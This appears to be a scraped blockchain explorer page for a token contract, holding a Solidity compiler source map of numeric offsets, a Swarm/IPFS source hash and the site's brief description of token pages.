8716:8950:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;10973:94;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12264:193;;;;;;:::i;:::-;;:::i;:::-;;;2325:14:1;;2318:22;2300:41;;2288:2;2273:18;12264:193:0;2255:92:1;11131:102:0;11213:12;;11131:102;;;5848:25:1;;;5836:2;5821:18;11131:102:0;5803:76:1;12928:444:0;;;;;;:::i;:::-;;:::i;10661:86::-;;;10738:1;6026:36:1;;6014:2;5999:18;10661:86:0;5981:87:1;13780:281:0;;;;;;:::i;:::-;;:::i;11295:162::-;;;;;;:::i;:::-;;:::i;10286:146::-;;;:::i;:::-;;10513:81;10580:6;;10513:81;;-1:-1:-1;;;;;10580:6:0;;;1789:51:1;;1777:2;1762:18;10513:81:0;1744:102:1;10812:98:0;;;:::i;14563:381::-;;;;;;:::i;:::-;;:::i;11669:199::-;;;;;;:::i;:::-;;:::i;11930:188::-;;;;;;:::i;:::-;-1:-1:-1;;;;;12082:19:0;;;12050:7;12082:19;;;:11;:19;;;;;;;;:28;;;;;;;;;;;;;11930:188;10973:94;11021:13;11054:5;11047:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;10973:94;:::o;12264:193::-;12368:4;12390:37;12399:10;12411:7;12420:6;12390:8;:37::i;:::-;-1:-1:-1;12445:4:0;12264:193;;;;:::o;12928:444::-;13062:4;13079:36;13089:6;13097:9;13108:6;13079:9;:36::i;:::-;13126:216;13149:6;13170:10;13195:136;13249:6;13195:136;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;13195:19:0;;;;;;:11;:19;;;;;;;;13215:10;13195:31;;;;;;;;;:136;:35;:136::i;:::-;13126:8;:216::i;:::-;-1:-1:-1;13360:4:0;12928:444;;;;;:::o;13780:281::-;13925:10;13880:4;13972:23;;;:11;:23;;;;;;;;-1:-1:-1;;;;;13972:32:0;;;;;;;;;;13880:4;;13902:129;;13950:7;;13972:48;;14009:10;13972:36;:48::i;11295:162::-;-1:-1:-1;;;;;11431:18:0;;11399:7;11431:18;;;:9;:18;;;;;;11295:162;;;;:::o;10286:146::-;9913:6;;-1:-1:-1;;;;;9913:6:0;9899:10;:20;9891:65;;;;-1:-1:-1;;;9891:65:0;;4732:2:1;9891:65:0;;;4714:21:1;;;4751:18;;;4744:30;4810:34;4790:18;;;4783:62;4862:18;;9891:65:0;;;;;;;;;10345:6:::1;:19:::0;;-1:-1:-1;;;;;;10345:19:0::1;::::0;;10380:44:::1;::::0;10362:1:::1;::::0;10401:10:::1;::::0;10380:44:::1;::::0;10362:1;;10380:44:::1;10286:146::o:0;10812:98::-;10862:13;10895:7;10888:14;;;;;:::i;14563:381::-;14668:4;14690:224;14713:10;14738:7;14760:143;14815:15;14760:143;;;;;;;;;;;;;;;;;14772:10;14760:23;;;;:11;:23;;;;;;;;-1:-1:-1;;;;;14760:32:0;;;;;;;;;;;:143;:36;:143::i;11669:199::-;11776:4;11798:40;11808:10;11820:9;11831:6;11798:9;:40::i;17289:374::-;-1:-1:-1;;;;;17418:20:0;;17410:69;;;;-1:-1:-1;;;17410:69:0;;5499:2:1;17410:69:0;;;5481:21:1;5538:2;5518:18;;;5511:30;5577:34;5557:18;;;5550:62;-1:-1:-1;;;5628:18:1;;;5621:34;5672:19;;17410:69:0;5471:226:1;17410:69:0;-1:-1:-1;;;;;17498:21:0;;17490:68;;;;-1:-1:-1;;;17490:68:0;;3566:2:1;17490:68:0;;;3548:21:1;3605:2;3585:18;;;3578:30;3644:34;3624:18;;;3617:62;-1:-1:-1;;;3695:18:1;;;3688:32;3737:19;;17490:68:0;3538:224:1;17490:68:0;-1:-1:-1;;;;;17569:19:0;;;;;;;:11;:19;;;;;;;;:28;;;;;;;;;;;;;:37;;;17622:33;;5848:25:1;;;17622:33:0;;5821:18:1;17622:33:0;;;;;;;17289:374;;;:::o;15434:829::-;-1:-1:-1;;;;;15566:20:0;;15558:70;;;;-1:-1:-1;;;15558:70:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;15647:23:0;;15639:71;;;;-1:-1:-1;;;15639:71:0;;3162:2:1;15639:71:0;;;3144:21:1;3201:2;3181:18;;;3174:30;3240:34;3220:18;;;3213:62;-1:-1:-1;;;3291:18:1;;;3284:33;3334:19;;15639:71:0;3134:225:1;15639:71:0;15721:16;15730:6;15721:8;:16::i;:::-;-1:-1:-1;;;;;15770:17:0;;15748:19;15770:17;;;:9;:17;;;;;;15820:21;;;;15798:109;;;;-1:-1:-1;;;15798:109:0;;4325:2:1;15798:109:0;;;4307:21:1;4364:2;4344:18;;;4337:30;4403:34;4383:18;;;4376:62;-1:-1:-1;;;4454:18:1;;;4447:36;4500:19;;15798:109:0;4297:228:1;15798:109:0;-1:-1:-1;;;;;15943:17:0;;;;;;;:9;:17;;;;;;15963:20;;;15943:40;;16163:20;;;;;;;;;;:30;;;;;;16220:35;;;;;;15977:6;5848:25:1;;5836:2;5821:18;;5803:76;16220:35:0;;;;;;;;15434:829;;;;:::o;4884:224::-;5004:7;5040:12;5032:6;;;;5024:29;;;;-1:-1:-1;;;5024:29:0;;;;;;;;:::i;:::-;-1:-1:-1;5064:9:0;5076:5;5080:1;5076;:5;:::i;:::-;5064:17;4884:224;-1:-1:-1;;;;;4884:224:0:o;3999:179::-;4057:7;;4089:5;4093:1;4089;:5;:::i;:::-;4077:17;;4118:1;4113;:6;;4105:46;;;;-1:-1:-1;;;4105:46:0;;3969:2:1;4105:46:0;;;3951:21:1;4008:2;3988:18;;;3981:30;4047:29;4027:18;;;4020:57;4094:18;;4105:46:0;3941:177:1;4105:46:0;4169:1;3999:179;-1:-1:-1;;;3999:179:0:o;16271:372::-;9271:16;:23;;-1:-1:-1;;;;9271:23:0;-1:-1:-1;;;9271:23:0;;;-1:-1:-1;;;;;16344:20:0;::::1;16336:70;;;;-1:-1:-1::0;;;16336:70:0::1;;;;;;;:::i;:::-;16451:5;::::0;:71:::1;::::0;-1:-1:-1;;;16451:71:0;;-1:-1:-1;;;;;2081:15:1;;;16451:71:0::1;::::0;::::1;2063:34:1::0;16506:4:0::1;2113:18:1::0;;;2106:43;16418:10:0::1;::::0;;;16451:5;::::1;::::0;:11:::1;::::0;1998:18:1;;16451:71:0::1;::::0;::::1;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;16417:105;;;;16537:9;16550:1;16537:14;16533:27;;;16553:7;;;;16533:27;16574:5;16570:66;;;16742:1:::0;16735:12;;;16784:1;16768:10;16761:29;16824:2;16811:16;;16804:27;;;16596:28:::1;9305:1;;;-1:-1:-1::0;9317:16:0;:24;;-1:-1:-1;;;;9317:24:0;;;16271:372::o;14:173:1:-;82:20;;-1:-1:-1;;;;;131:31:1;;121:42;;111:2;;177:1;174;167:12;192:196;;304:2;292:9;283:7;279:23;275:32;272:2;;;325:6;317;310:22;272:2;353:29;372:9;353:29;:::i;393:270::-;;;522:2;510:9;501:7;497:23;493:32;490:2;;;543:6;535;528:22;490:2;571:29;590:9;571:29;:::i;:::-;561:39;;619:38;653:2;642:9;638:18;619:38;:::i;:::-;609:48;;480:183;;;;;:::o;668:338::-;;;;814:2;802:9;793:7;789:23;785:32;782:2;;;835:6;827;820:22;782:2;863:29;882:9;863:29;:::i;:::-;853:39;;911:38;945:2;934:9;930:18;911:38;:::i;:::-;901:48;;996:2;985:9;981:18;968:32;958:42;;772:234;;;;;:::o;1011:264::-;;;1140:2;1128:9;1119:7;1115:23;1111:32;1108:2;;;1161:6;1153;1146:22;1108:2;1189:29;1208:9;1189:29;:::i;:::-;1179:39;1265:2;1250:18;;;;1237:32;;-1:-1:-1;;;1098:177:1:o;1280:358::-;;;1417:2;1405:9;1396:7;1392:23;1388:32;1385:2;;;1438:6;1430;1423:22;1385:2;1475:9;1469:16;1528:5;1521:13;1514:21;1507:5;1504:32;1494:2;;1555:6;1547;1540:22;1494:2;1628;1613:18;;;;1607:25;1583:5;;1607:25;;-1:-1:-1;;;1375:263:1:o;2352:603::-;;2493:2;2522;2511:9;2504:21;2554:6;2548:13;2597:6;2592:2;2581:9;2577:18;2570:34;2622:4;2635:140;2649:6;2646:1;2643:13;2635:140;;;2744:14;;;2740:23;;2734:30;2710:17;;;2729:2;2706:26;2699:66;2664:10;;2635:140;;;2793:6;2790:1;2787:13;2784:2;;;2863:4;2858:2;2849:6;2838:9;2834:22;2830:31;2823:45;2784:2;-1:-1:-1;2939:2:1;2918:15;-1:-1:-1;;2914:29:1;2899:45;;;;2946:2;2895:54;;2473:482;-1:-1:-1;;;2473:482:1:o;4891:401::-;5093:2;5075:21;;;5132:2;5112:18;;;5105:30;5171:34;5166:2;5151:18;;5144:62;-1:-1:-1;;;5237:2:1;5222:18;;5215:35;5282:3;5267:19;;5065:227::o;6073:128::-;;6144:1;6140:6;6137:1;6134:13;6131:2;;;6150:18;;:::i;:::-;-1:-1:-1;6186:9:1;;6121:80::o;6206:125::-;;6274:1;6271;6268:8;6265:2;;;6279:18;;:::i;:::-;-1:-1:-1;6316:9:1;;6255:76::o;6336:380::-;6421:1;6411:12;;6468:1;6458:12;;;6479:2;;6533:4;6525:6;6521:17;6511:27;;6479:2;6586;6578:6;6575:14;6555:18;6552:38;6549:2;;;6632:10;6627:3;6623:20;6620:1;6613:31;6667:4;6664:1;6657:15;6695:4;6692:1;6685:15;6549:2;;6391:325;;;:::o;6721:127::-;6782:10;6777:3;6773:20;6770:1;6763:31;6813:4;6810:1;6803:15;6837:4;6834:1;6827:15

Swarm Source

ipfs://a08b6fbe1b0cc30a0bdd5100953dea3a045afab15df5502a9d782c411550d455
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.